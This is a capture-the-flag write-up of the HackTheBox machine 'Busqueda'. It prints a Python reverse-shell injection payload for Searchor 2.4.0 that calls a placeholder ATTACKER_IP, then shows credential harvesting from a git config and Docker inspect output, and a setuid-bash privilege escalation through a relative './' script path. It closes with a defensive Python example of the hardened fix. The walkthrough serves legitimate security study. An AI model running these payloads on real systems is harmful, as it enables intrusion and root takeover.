---
# System prepended metadata

title: HTB - Busqueda

---

# HTB Busqueda - writeup
nmap scan:
![image](https://hackmd.io/_uploads/ByhBnXHtbl.png)
**1. Apache server**
**2. SSH**
## USER'S FLAG
add a host entry for the target to `/etc/hosts`:
![image](https://hackmd.io/_uploads/HkVKT7HKWe.png)

website:
![image](https://hackmd.io/_uploads/rJL8R7HFZg.png)

**vulnerable: Searchor 2.4.0**

https://github.com/nexis-nexis/Searchor-2.4.0-POC-Exploit-
payload: 
```
', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"))#

```

use payload
![image](https://hackmd.io/_uploads/rkUWJ4BFWx.png)

get shell
![image](https://hackmd.io/_uploads/SkEooQBFbl.png)

**HERE WE GOT USER'S FLAG**
## ROOT'S FLAG


use `cat /var/www/app/.git/config` to see what it shows
![image](https://hackmd.io/_uploads/S1151VHF-l.png)
we get cody's password

log in over SSH
![image](https://hackmd.io/_uploads/HyCmZ4HFbg.png)

see what cody can execute
![image](https://hackmd.io/_uploads/rkT2WESYWx.png)

`system-checkup.py` can be run as root
![image](https://hackmd.io/_uploads/ry-dMNHFbe.png)
list the running Docker containers
![image](https://hackmd.io/_uploads/S10rXNSKZx.png)
the target container is "gitea"
learn how the format argument works:
https://docs.docker.com/reference/cli/docker/inspect/
![image](https://hackmd.io/_uploads/H1gs44rtbl.png)
https://docs.docker.com/engine/cli/formatting/
we want to see the data in the containers
![image](https://hackmd.io/_uploads/SkLCVNBY-e.png)

pipe the output through `| jq` to make it easier to read
![image](https://hackmd.io/_uploads/SymGQrrK-e.png)

find the database password
![image](https://hackmd.io/_uploads/H1w3GrHYbe.png)

change the host entry in `/etc/hosts`
![image](https://hackmd.io/_uploads/SyuhtNStbl.png)

open the website
![image](https://hackmd.io/_uploads/SJCx8HBKZe.png)
see users
![image](https://hackmd.io/_uploads/S1BvISStbe.png)

use the database password to log in
![image](https://hackmd.io/_uploads/H1xiIBSFbg.png)

find a script that can only be read by admin
![image](https://hackmd.io/_uploads/HJfyPHHtZx.png)

`full-checkup` is what the user (svc) can run
![image](https://hackmd.io/_uploads/SJmgvrSYbe.png)

**vulnerable: the `full-checkup` action runs the script via `./` instead of using the full path**
![image](https://hackmd.io/_uploads/HJofPSHF-g.png)

create a fake `full-checkup.sh` file and put the payload in it

```
#!/bin/bash
chmod +s /bin/bash

```
use vi to create `full-checkup.sh` in `/tmp`, and make it executable
![image](https://hackmd.io/_uploads/ryN3cHrFZg.png)

run `full-checkup` and get a shell, using `-p` to keep privileges
![Screenshot 2026-03-04 140639](https://hackmd.io/_uploads/rJe8J8SK-x.png)

see what we've got in `/root/`
![image](https://hackmd.io/_uploads/r1wPCSHYWx.png)

**HERE WE GOT ROOT'S FLAG**
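
The fix for the `./` flaw in the `full-checkup` action, as an added example (not code from the box or from this writeup's screenshots): the `./` pattern resolves against the caller's working directory, while the hardened form resolves the script inside a fixed directory and checks ownership and write bits first. The function names, the `trusted_dir` parameter and the harmless `echo` scripts are assumptions constructed for the demo, and the interpreter is called explicitly as `/bin/sh`.

```python
import os
import stat
import subprocess
import tempfile


def resolve_trusted_script(name, trusted_dir):
    """Return the absolute path of `name` inside `trusted_dir`, or raise PermissionError."""
    base = os.path.realpath(trusted_dir)
    path = os.path.realpath(os.path.join(base, name))
    # Reject names that leave the trusted directory ("../x", absolute paths, symlinks).
    if os.path.dirname(path) != base:
        raise PermissionError(f"{name!r} resolves outside {base}")
    for p in (base, path):
        st = os.stat(p)
        # Directory and file must belong to the effective user and must not be
        # writable by group or others, or a lower-privileged user could swap them.
        if st.st_uid != os.geteuid() or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            raise PermissionError(f"{p}: wrong owner or group/world-writable")
    return path


def run_action_vulnerable(name):
    """Pattern from the writeup: './' is resolved against the caller's cwd."""
    out = subprocess.run(["/bin/sh", "./" + name], capture_output=True, text=True, check=True)
    return out.stdout.strip()


def run_action(name, trusted_dir):
    """Hardened form: vetted absolute path, independent of the caller's cwd."""
    script = resolve_trusted_script(name, trusted_dir)
    out = subprocess.run(["/bin/sh", script], capture_output=True, text=True, check=True)
    return out.stdout.strip()


def demo():
    """Constructed scenario: real script in a trusted dir, same-named decoy in the cwd."""
    old_cwd = os.getcwd()
    with tempfile.TemporaryDirectory() as trusted, tempfile.TemporaryDirectory() as cwd:
        for d, marker in ((trusted, "trusted"), (cwd, "decoy")):
            p = os.path.join(d, "full-checkup.sh")
            with open(p, "w") as f:
                f.write(f"#!/bin/sh\necho {marker}\n")
            os.chmod(p, 0o755)
        os.chdir(cwd)
        try:
            return run_action_vulnerable("full-checkup.sh"), run_action("full-checkup.sh", trusted)
        finally:
            os.chdir(old_cwd)
```

`demo()` returns `("decoy", "trusted")`: the relative call runs whatever file sits in the current directory, the hardened call runs only the vetted script.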